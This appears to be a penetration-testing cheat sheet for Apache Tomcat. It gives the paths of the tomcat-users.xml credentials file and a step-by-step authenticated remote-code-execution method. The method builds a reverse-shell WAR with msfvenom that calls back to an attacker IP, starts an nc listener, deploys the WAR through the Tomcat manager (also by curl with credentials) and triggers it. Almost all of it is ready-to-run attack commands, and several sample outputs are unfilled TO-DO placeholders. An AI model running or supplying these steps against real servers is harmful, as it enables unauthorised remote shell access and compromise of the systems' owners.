Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Config Location
/usr/share/tomcat9/etc/tomcat-users.xml
Sample Output:
TO-DO/etc/tomcat9/tomcat-users.xml
Sample Output:
TO-DORCE (Authenicated)
1. Create a WAR file
msfvenom -p java/shell_reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f war -o revshell.war
Sample Output:
$ msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.31 LPORT=1337 -f war -o revshell.war
Payload size: 13029 bytes
Final size of war file: 13029 bytes
Saved as: revshell.war
2. Start a listener
rlwrap nc -lvnp <LOCAL_PORT>
Sample Output:
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ..
+--------------------------------------------+
| Exploit |
+--------------------------------------------+
| 1. Login to Tomcat Web Application Manager |
| 2. WAR file to deploy -> Deploy |
| 3. Click /revshell in Applications table |
+--------------------------------------------+
Sample Output:
TO-DOcurl -u '<USER>:<PASSWORD>' http://<DOMAIN>:8080/manager/text/deploy?path=/revshell --upload-file revshell.war
Sample Output:
TO-DOcurl -s http://<DOMAIN>:8080/revshell
Sample Output:
TO-DO